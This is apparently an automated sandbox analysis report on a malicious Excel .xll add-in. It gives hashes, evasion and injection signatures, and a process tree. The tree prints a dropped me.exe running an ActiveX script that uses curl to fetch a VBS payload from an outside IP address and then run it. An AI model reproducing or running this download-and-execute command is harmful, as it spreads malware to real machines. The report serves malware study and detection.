Analysis
-
max time kernel
149s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2023 07:01
Static task
static1
Behavioral task
behavioral1
Sample
392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll
Resource
win10v2004-20230915-en
General
-
Target
392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll
-
Size
50KB
-
MD5
d1a45948f411c02136ca98410475de52
-
SHA1
86ce40651326b8a67730da4e429d1bc202d46226
-
SHA256
392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
-
SHA512
22f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0
-
SSDEEP
1536:oUK23Jsm6Nh5wF3s8KjrtN/5TqRGiNwmU2x0X2Y:ICsNh5wF3s8KXHRTviNnAmY
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
me.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation me.exe -
Executes dropped EXE 1 IoCs
Processes:
me.exepid Process 4020 me.exe -
Loads dropped DLL 2 IoCs
Processes:
EXCEL.EXEpid Process 4180 EXCEL.EXE 4180 EXCEL.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 4180 EXCEL.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid Process 4180 EXCEL.EXE 4180 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
EXCEL.EXEpid Process 4180 EXCEL.EXE 4180 EXCEL.EXE 4180 EXCEL.EXE 4180 EXCEL.EXE 4180 EXCEL.EXE 4180 EXCEL.EXE 4180 EXCEL.EXE 4180 EXCEL.EXE 4180 EXCEL.EXE 4180 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEme.execmd.exedescription pid Process procid_target PID 4180 wrote to memory of 4020 4180 EXCEL.EXE 87 PID 4180 wrote to memory of 4020 4180 EXCEL.EXE 87 PID 4020 wrote to memory of 2652 4020 me.exe 88 PID 4020 wrote to memory of 2652 4020 me.exe 88 PID 2652 wrote to memory of 2544 2652 cmd.exe 90 PID 2652 wrote to memory of 2544 2652 cmd.exe 90
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Users\Public\me.exeC:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.vbs http://5.42.77.33/QvCY2SE/123&&timeout 10&&c:\\users\\public\\1.vbs', 0); window.close();</script>"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.77.33/QvCY2SE/123&&timeout 10&&c:\users\public\1.vbs3⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\system32\curl.exeC:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://5.42.77.33/QvCY2SE/1234⤵PID:2544
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll
Filesize50KB
MD5d1a45948f411c02136ca98410475de52
SHA186ce40651326b8a67730da4e429d1bc202d46226
SHA256392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
SHA51222f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0
-
C:\Users\Admin\AppData\Local\Temp\392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23.xll
Filesize50KB
MD5d1a45948f411c02136ca98410475de52
SHA186ce40651326b8a67730da4e429d1bc202d46226
SHA256392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23
SHA51222f9f8691231d9880dbbef40e971f098e4970d246b66baafc0d3b4d65c2e20abf89e5668015311500b2ccddecfc4c1a664d6c322c71bce68fe28c08bb62090b0
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
Filesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045